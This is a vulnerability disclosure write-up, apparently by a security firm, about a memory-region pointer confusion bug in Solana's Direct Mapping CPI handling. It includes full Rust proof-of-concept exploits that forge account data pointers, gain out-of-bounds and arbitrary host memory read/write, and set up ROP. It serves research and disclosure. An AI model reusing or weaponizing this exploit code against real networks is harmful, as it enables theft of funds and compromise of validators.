impl<'a> UnalignedMemoryMapping<'a> {
    ...
    pub fn region(
        &self,
        access_type: AccessType,
        vm_addr: u64,
    ) -> Result<&MemoryRegion, Box<dyn std::error::Error>> {
        // Safety:
        // &mut references to the mapping cache are only created internally from methods that do not
        // invoke each other. UnalignedMemoryMapping is !Sync, so the cache reference below is
        // guaranteed to be unique.
        let cache = unsafe { &mut *self.cache.get() };
        if let Some(region) = self.find_region(cache, vm_addr) {
            if (region.vm_addr..region.vm_addr_end).contains(&vm_addr)
                && (access_type == AccessType::Load || ensure_writable_region(region, &self.cow_cb))
            {
                return Ok(region);
            }
        }
        Err(generate_access_violation(self.config, access_type, vm_addr, 0, 0).unwrap_err())
    }
    ...
}

// Vulnerable implementation (simplified)
fn update_caller_account(
    invoke_context: &InvokeContext,
    memory_mapping: &mut MemoryMapping,
    is_loader_deprecated: bool,
    caller_account: &mut CallerAccount,
    callee_account: &mut BorrowedAccount<'_>,
    direct_mapping: bool,
) -> Result<(), Error> {
    ...

    if direct_mapping && caller_account.original_data_len > 0 {
        ...
        let region = memory_mapping.region(AccessType::Load, caller_account.vm_data_addr)?;
        let callee_ptr = callee_account.get_data().as_ptr() as u64;
        if region.host_addr.get() != callee_ptr {
            region.host_addr.set(callee_ptr);
        }
    }

The immediate question is: does this invariant of correctly identifying the MemoryRegion actually hold?

The answer is no. Recall CallerAccount.vm_data_addr comes directly from AccountInfo.data.as_ptr() in the VM's heap memory - memory that programs have complete control over.

fn from_account_info(
    invoke_context: &InvokeContext,
    memory_mapping: &MemoryMapping,
    is_loader_deprecated: bool,
    _vm_addr: u64,
    account_info: &AccountInfo,
    original_data_len: usize,
) -> Result<CallerAccount<'a>, Error> {
    ...

    let (serialized_data, vm_data_addr, ref_to_len_in_vm, serialized_len_ptr) = {
        // Double translate data out of RefCell
        let data = *translate_type::<&[u8]>(
            memory_mapping,
            account_info.data.as_ptr() as *const _ as u64,
            invoke_context.get_check_aligned(),
        )?;

        ...

        (
            serialized_data,
            vm_data_addr,
            ref_to_len_in_vm,
            serialized_len_ptr,
        )
    };

    Ok(CallerAccount {
        vm_data_addr,
        ...
    })
}

By manipulating the AccountInfo.data pointer in VM memory before triggering a CPI call, an attacker can forge the vm_data_addr value. This causes update_caller_account to locate the wrong MemoryRegion and update its host_addr to point to the attacker's target account data, effectively mapping the virtual memory of some MemoryRegion to a wrong host memory.

A Failed Exploit that Led Us Deeper

Though the primitive seems extremely powerful, exploitation wasn't as smooth as it might seem. After identifying the critical oversight, we started assessing its impact.

Our first intuition was that since virtual memory is mapped incorrectly, it should be possible to bypass the memory write authorization checks, for example by mapping a writable virtual memory region to some account data that should be read-only. This would be sufficient to allow attackers to steal funds by modifying token program accounts. Our first PoC implemented this idea, and it worked on an older version of Direct Mapping.

use std::{
    ptr,
    mem,
    rc::Rc,
    cell::RefCell,
};
use solana_program::{
    account_info::AccountInfo,
    instruction::{
        AccountMeta,
        Instruction,
    },
    program::invoke_signed,
    entrypoint::{
        self,
        ProgramResult,
    },
    pubkey::Pubkey,
};

entrypoint!(process_instruction);


// accounts[0] : LEVERAGE account controlled by ATTACKER and owned by EXPLOIT program
// accounts[1] : VICTIM account ATTACKER wants to modify
// accounts[2] : BENIGN program that owns VICTIM account ATTACKER wants to modify
pub fn process_instruction(
    _program_id: &Pubkey,
    accounts: &[AccountInfo],
    _instruction_data: &[u8],
) -> ProgramResult {

    // trigger CoW here to prevent future issues
    accounts[0].data.borrow_mut()[10] = 2;

    // copy data pointers to force the following cpi update_caller_account to update incorrect region
    unsafe {
        ptr::copy(
            mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>(
                &accounts[0].data // LEVERAGE
            ),
            mem::transmute(
                mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>(
                    &accounts[1].data // VICTIM
                )
            ),
            mem::size_of::<Rc<RefCell<&mut [u8]>>>()
        );
    }
    invoke_signed(
        &Instruction::new_with_bincode(
            accounts[2].key.clone(),
            b"",
            vec![
                AccountMeta::new(accounts[1].key.clone(), false),
            ]
        ),
        &[
            accounts[1].clone(),
        ],
        &[],
    )?;

    // this will write to accounts[1].data due to corrupted region.host_addr
    accounts[0].data.borrow_mut()[10] = 1;
    Ok(())
}

However, once we pulled the latest code, our PoC stopped working. How so?

Coincidentally, Solana was actively patching another bug while we were developing our PoC. We originally thought the patch was irrelevant to our bug, but it ended up blocking our first exploit.

The patch addresses a mistake where MemoryRegion states are not updated properly across CPIs. That fix landed in this commit. The main addition of the patch is shown below.

fn update_caller_account_perms(
    memory_mapping: &MemoryMapping,
    caller_account: &CallerAccount,
    callee_account: &BorrowedAccount<'_>,
    is_loader_deprecated: bool,
) -> Result<(), Error> {
    let CallerAccount {
        original_data_len,
        vm_data_addr,
        ..
    } = caller_account;

    let data_region = account_data_region(memory_mapping, *vm_data_addr, *original_data_len)?;
    if let Some(region) = data_region {
        match (
            region.state.get(),
            callee_account.can_data_be_changed().is_ok(),
        ) {
            (MemoryState::Readable, true) => {
                // If the account is still shared it means it wasn't written to yet during this
                // transaction. We map it as CoW and it'll be copied the first time something
                // tries to write into it.
                if callee_account.is_shared() {
                    let index_in_transaction = callee_account.get_index_in_transaction();
                    region
                        .state
                        .set(MemoryState::Cow(index_in_transaction as u64));
                } else {
                    region.state.set(MemoryState::Writable);
                }
            }

            (MemoryState::Writable | MemoryState::Cow(_), false) => {
                region.state.set(MemoryState::Readable);
            }
            _ => {}
        }
    }
    let realloc_region = account_realloc_region(
        memory_mapping,
        *vm_data_addr,
        *original_data_len,
        is_loader_deprecated,
    )?;
    if let Some(region) = realloc_region {
        region
            .state
            .set(if callee_account.can_data_be_changed().is_ok() {
                MemoryState::Writable
            } else {
                MemoryState::Readable
            });
    }

    Ok(())
}

The idea of the patch is that when a CPI happens, changes to the owner of an account may be updated and flushed to TransactionContext. One example of this is when creating a new token account. The caller is expected to transfer ownership of an empty account to the token program, and the token program will then initialize the token account with relevant data. Obviously we should no longer allow the caller program to directly write the token account data after the token program has taken ownership of it. With Direct Mapping enabled, this means MemoryRegion state must be updated accordingly.

At first glance, the patch seemed unrelated to our finding. But unfortunately, updating state means that while we may point the host pointer of an originally writable MemoryRegion to some unwritable account data, after CPI finishes, the MemoryRegion will just end up being marked as readonly. This kills our exploit.

Still, the vulnerability itself hadn't been patched. We just need to bypass the new checks, and that is exactly what we, Anatomist Security, are best at. With years of deep security research and CTF experience, we specialize in turning dead ends into breakthroughs.

New Exploitation Strategy

So back to the drawing board, what else can we do with our bug? The essence of the bug is confusion of MemoryRegion.host_addr. In other words, we could overwrite an arbitrary MemoryRegion's host_addr with another MemoryRegion's host_addr.

While our first attempt was to change the host_addr of a writable MemoryRegion to some readonly account data buffer, it is definitely not the only way to wield the bug. Our second idea is, instead of trying to write to a readonly account data buffer, what if we changed the host_addr of a writable MemoryRegion to the backing buffer of another writable MemoryRegion that has a different length?

The New Attack Vector: Size Confusion

This new idea led us to a completely different exploitation approach. Instead of trying to bypass permission checks, we could exploit size differences between different account buffers for out-of-bound read/write, a primitive commonly used in binary exploitation.

Consider two accounts, both writable by the attacker:

  • SWAP: A small-sized buffer account with data length 0x100
  • LEVERAGE: A bigger-sized buffer account with data length 0x400, whose MemoryRegion.host_addr will be replaced with SWAP's host_addr

If we can make the LEVERAGE account's MemoryRegion point to the SWAP account's buffer, then by accessing LEVERAGE's virtual memory we end up touching SWAP's data buffer on the host. Since LEVERAGE's MemoryRegion has a size of 0x400, larger than the underlying SWAP host buffer, once we go past the first 0x100 bytes of LEVERAGE's virtual memory we map beyond the end of the SWAP data buffer. This gives us an out-of-bounds read/write primitive on host memory.

From Limited OOB to Arbitrary Read/Write

With this, we gain out-of-bounds read/write access to 0x300 bytes (0x400 - 0x100) after SWAP's data buffer in host memory. However, this primitive is limited to a specific range. We need to make it more powerful.

The idea is straightforward: since MemoryRegion structures also reside in host memory, we can scan the out-of-bounds region to locate other MemoryRegion structures. By modifying their host_addr fields to point to our target addresses, accessing the corresponding virtual memory provides arbitrary read/write access to those target addresses. We just need to spray a lot of writable accounts and make the size difference larger to increase the success rate.

Proof-of-Concept

Now, let's take a deep dive into a PoC of how to exploit this vulnerability from the ground up.

Detailed Attack Steps

The exploit requires three specific accounts with distinct purposes:

  • SWAP: Small buffer account that serves as the target of the corrupted pointer. Its small buffer will be incorrectly mapped into LEVERAGE's large virtual space.
  • POINTER: Pointer account whose MemoryRegion.host_addr will be rewritten during memory scanning to point to arbitrary memory addresses. This account serves as our pointer pivot to achieve arbitrary read/write capability.
  • LEVERAGE: Large buffer account whose MemoryRegion.host_addr will be hijacked to point to SWAP's smaller buffer, creating the size mismatch for out-of-bounds access.

Step 1: Account Preparation

First, we want to trigger copy-on-write on both LEVERAGE and SWAP accounts and also resize LEVERAGE to 1 byte to make the code path later simpler.

// Trigger copy-on-write for dedicated buffers
accounts[leverage_idx].data.borrow_mut()[0] = 1;
accounts[swap_idx].data.borrow_mut()[0] = 1;

// Resize LEVERAGE to simplify exploit logic
accounts[leverage_idx].realloc(1, false)?;

Step 2: Fake Pointer Setup

Then we want to overwrite SWAP's AccountInfo.data pointer with LEVERAGE's data pointer. This will cause the runtime to extract LEVERAGE's data address when retrieving SWAP's vm_data_addr during CPI.

unsafe {
    ptr::copy(
        mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>(&accounts[leverage_idx].data),
        mem::transmute::<&Rc<RefCell<&mut [u8]>>, *mut u8>(&accounts[swap_idx].data),
        mem::size_of::<Rc<RefCell<&mut [u8]>>>(),
    );
}

Step 3: Vulnerability Trigger via CPI

Now we trigger the flawed update_caller_account() logic by initiating a CPI call that does nothing but includes the corrupted SWAP account.

invoke_signed(
    &Instruction::new_with_bincode(
        *program_id,
        b"",
        vec![AccountMeta::new(accounts[swap_idx].key.clone(), false)],
    ),
    &[accounts[swap_idx].clone()],
    &[],
)?;

During this CPI call, the runtime builds a CallerAccount for SWAP using the malformed vm_data_addr. Later when CPI returns, it starts the MemoryRegion update process, but instead of finding SWAP's MemoryRegion, it locates LEVERAGE's MemoryRegion and updates LEVERAGE's MemoryRegion.host_addr to point to SWAP's buffer.

Step 4: Size Mismatch to OOB

Next, we expand LEVERAGE to create the size mismatch.

// Resize LEVERAGE back to a larger size for memory scanning
accounts[leverage_idx].realloc(0xa00000, false)?;

So when we access LEVERAGE beyond SWAP's buffer size, we get out-of-bounds access to host memory.

Step 5: Egg Hunting for MemoryRegion

With the out-of-bounds read/write, we can now hunt for the POINTER account's MemoryRegion structure in host memory.

let leverage_data = accounts[leverage_idx].data.borrow_mut();
let mut scan_ptr = leverage_data.as_ptr().add(0x2840); // Start OOB scanning

loop {
    let check_ptr = scan_ptr as u64;

    // Signature matching for MemoryRegion array
    if *((check_ptr + 0x18) as *const u64) == 0x000000040020a238 &&
       *((check_ptr + 0x58) as *const u64) == 0x0000000400202908 &&
       *((check_ptr + 0x98) as *const u64) == 0x000000040020f308 &&
       *((check_ptr + 0xd8) as *const u64) == 0x0000000400000000 {
        // Bingo!
        ...
    }
    ...
}

We do a really simple signature matching here to locate the POINTER MemoryRegion. Since the VM memory layout is fixed, the pointer fields inside MemoryRegion for specific indices of input accounts are also fixed, so we can just hardcode these VM layout pointers as our signature.

Step 6: Arbitrary R/W via MemoryRegion Hijacking

Once we've successfully hunted down the target MemoryRegion, we can overwrite the POINTER account's MemoryRegion.host_addr and set its state to writable to achieve arbitrary memory access. For example, we can calculate the thread memory base and hijack return addresses with ROP gadgets.

let thread_mem = (*((data_ptr + 0x48) as *const u64) >> 21) << 21;

// Overwrite POINTER account's backing buffer pointer (arb_ptr)
*((data_ptr + 0x490) as *mut u64) = thread_mem;
// Set memory region state to writable
*((data_ptr + 0x4b8) as *mut u64) = 1;

Final Exploit

Putting them all together, here's the final PoC:

use std::{ptr, mem, rc::Rc, cell::RefCell};
use solana_program::{
    account_info::AccountInfo,
    instruction::{AccountMeta, Instruction},
    program::invoke_signed,
    entrypoint,
    entrypoint::ProgramResult,
    pubkey::Pubkey,
};

entrypoint!(process_instruction);

// accounts[0]: SWAP account controlled by ATTACKER, owned by this EXPLOIT program.
// accounts[1]: POINTER account whose MemoryRegion will point to an arbitrary address.
// accounts[6]: LEVERAGE account controlled by ATTACKER, owned by this EXPLOIT program.

pub fn process_instruction(
    program_id: &Pubkey,
    accounts: &[AccountInfo],
    _instruction_data: &[u8],
) -> ProgramResult {
    if accounts.len() == 8 {
        let swap_idx = 0;
        let pointer_idx = 1;
        let leverage_idx = 6;

        // Prepare LEVERAGE and SWAP accounts to set up memory layout
        accounts[leverage_idx].data.borrow_mut()[0] = 1;
        accounts[swap_idx].data.borrow_mut()[0] = 1;

        // Resize LEVERAGE to simplify exploit logic
        accounts[leverage_idx].realloc(1, false)?;

        // Overwrite SWAP's data pointer with LEVERAGE's pointer
        unsafe {
            ptr::copy(
                mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>(&accounts[leverage_idx].data),
                mem::transmute::<&Rc<RefCell<&mut [u8]>>, *mut u8>(&accounts[swap_idx].data),
                mem::size_of::<Rc<RefCell<&mut [u8]>>>(),
            );
        }

        // Invoke CPI call to trigger pointer confusion
        invoke_signed(
            &Instruction::new_with_bincode(
                *program_id,
                b"",
                vec![AccountMeta::new(accounts[swap_idx].key.clone(), false)],
            ),
            &[accounts[swap_idx].clone()],
            &[],
        )?;

        // Resize LEVERAGE back to a larger size for memory scanning
        accounts[leverage_idx].realloc(0xa00000, false)?;

        unsafe {
            // Scan memory to locate MemoryRegion structure
            let mut data_ptr = accounts[leverage_idx].data.borrow_mut().as_ptr() as u64 + 0x2840;
            let arb_ptr = accounts[pointer_idx].data.borrow_mut().as_ptr() as u64;

            loop {
                // Signature matching to reliably identify MemoryRegion
                if *((data_ptr + 0x18) as *const u64) == 0x000000040020a238 &&
                   *((data_ptr + 0x58) as *const u64) == 0x0000000400202908 &&
                   *((data_ptr + 0x98) as *const u64) == 0x000000040020f308 &&
                   *((data_ptr + 0xd8) as *const u64) == 0x0000000400000000 {

                    let thread_mem = (*((data_ptr + 0x48) as *const u64) >> 21) << 21;

                    // Overwrite POINTER account's backing buffer pointer (arb_ptr)
                    *((data_ptr + 0x490) as *mut u64) = thread_mem;
                    // Set memory region state to writable
                    *((data_ptr + 0x4b8) as *mut u64) = 1;

                    // At this point, arb_ptr (accounts[pointer_idx]) points to arbitrary memory.
                    // ROP chain setup would occur here (omitted).

                    return Ok(());
                }

                // Move to next potential MemoryRegion structure
                data_ptr += (*((data_ptr + 0x08) as *const u64) >> 4) << 4;
            }
        }

        // Note: computation budget exhaustion may be necessary in real-world scenarios
    }

    Ok(())
}

After successfully getting arbitrary read/write, remote code execution (RCE) would be achievable using traditional binary exploitation tricks.

Notably, the PoCs shown here are nowhere near stable enough to launch an attack against an active Solana network. Specifically, we haven't implemented account spraying, and we used hardcoded offsets for calculating the thread stack and ROP gadgets. However, there are well-established approaches to weaponizing such PoCs into reliable exploits, and we leave this as an exercise for interested readers.

Final Thoughts

As demonstrated, even memory-safe languages like Rust can harbor subtle and powerful vulnerabilities, especially in complex systems utilizing unsafe code to push the boundaries of performance and optimization. What began as a curiosity about Solana’s JIT and memory model evolved into a critical finding that could have compromised the integrity of the entire network.

During our disclosure of the bug to Solana, the team was highly responsive, and also fast to understand the concepts discussed in the report. They also made significant decisions such as putting the Direct Mapping feature on hold for further scrutiny, instead of hastily launching it to meet deadlines. While bugs are inevitable, Solana's professional handling of bug disclosures shows their commitment to security, and demonstrates why it deserves to be a top tier project.

We had a lot of fun exploring this bug. Reading through code, understanding system design at a deep level, and crafting a non-obvious exploit path. These are the kinds of challenges we live for. Hopefully, this write-up sheds light on how the bug hunting process really works. It is not just about the final exploit, but about the twists, dead ends, and intuition that lead there. We hope you enjoyed reading it as much as we enjoyed the journey.

At Anatomist Security, we specialize in uncovering such vulnerabilities through deep technical research and rigorous security audits. If you're building complex software, especially in fast-moving areas like blockchain, and want to ensure its robustness, reach out. We'd love to help.